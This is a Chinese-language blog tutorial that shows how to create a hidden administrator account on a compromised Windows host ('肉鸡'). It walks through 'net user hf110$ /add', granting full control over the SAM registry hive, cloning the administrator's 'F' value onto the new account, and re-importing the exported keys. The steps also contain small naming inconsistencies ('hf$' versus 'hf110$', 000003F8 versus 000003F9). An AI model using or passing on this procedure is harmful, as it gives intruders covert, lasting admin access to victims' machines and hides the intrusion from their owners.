首先是登录肉鸡,至于怎么找肉鸡或是怎么开3389这里就不说了,下面直接演示怎么建立一个隐藏用户。大家看好了,有的人要说了CA不就可以了吗?呵呵,是的,但是如果你不知道管理员密码怎么办呢?还有,CA是克隆一个账号,不是建立一个隐藏的账号。
现在用我之前建立好的用户登录,是管理员权限,直接开始建立隐藏用户。
1.net user hf110$ hf110 /add
首先大家在命令提示符下建立一个用户,建立就可以了,不需要把它加入到管理员组。
2.在开始/运行中输入:regedt32.exe并回车运行regedt32.exe。
3.点“安全->权限”以后会弹出窗口,要说明的是,点击“权限”之前要选择一下项,因为SAM在HKEY_LOCAL_MACHINE下,所以我们就选择这个,然后把我们所登录的用户加进去。当可以看见SAM下面的项的时候就说明可以了,我们就进行下面的操作。要选中“完全控制”,
看见了吧?之前看不见的东西现在也可以看见了。还有就是,如果有时候不行,那就把每个都重新加权限。
4.在运行里面输入regedit打开注册表,打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hf110$。将项hf110$、000003F9、000001F4(是管理员的,你可以看名称来找)导出为hf.reg,000003F8.reg,000001F4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hf110$对应的000003F9项下的键"F"的值,然后再将000003F9与hf110$.reg合并。
5.在命令行下执行net user hf$ /del将用户hf110$删除,把hf110$.reg导入注册表。
下面我们就来看看这个隐藏用户有没有建立成功,OK;登录测试OK,已经有管理员权限了,并且已经成功隐藏。
没有评论:
发表评论